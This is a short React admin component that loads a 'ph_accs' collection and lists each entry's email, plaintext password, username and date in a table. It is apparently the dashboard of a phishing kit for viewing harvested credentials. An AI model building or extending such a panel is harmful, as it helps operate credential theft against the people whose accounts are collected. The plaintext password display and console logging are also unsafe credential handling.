import React, {useEffect, useState} from 'react';
import {getCollection} from "../help/helper";
import 'bootstrap/dist/css/bootstrap.min.css';
import {Table} from "react-bootstrap";
import '../styles/Admin.css'


const PhAccs = () => {
    const [ph_accs, setPh_accs] = useState([]);
    useEffect(() => {
        getCollection('ph_accs').then( r => {
            console.log(r)
            setPh_accs(r)
        }).catch( e => {

        })
    }, []);
    return (
        <div className={'Table_admin_accs_container'}>
            <Table striped bordered hover variant="dark">
                <thead>
                <tr>
                    <th>#</th>
                    <th>Email</th>
                    <th>Password</th>
                    <th>Username</th>
                    <th>Date</th>
                </tr>
                </thead>
                <tbody>
                {ph_accs.map( (m, index) => (
                    <tr>
                    <td>{index}</td>
                    <td>{m.mail}</td>
                    <td>{m.password}</td>
                    <td>{m.username}</td>
                    <td>{m.date}</td>
                    </tr>
                ))}
                </tbody>
            </Table>
        </div>
    );
};

export default PhAccs;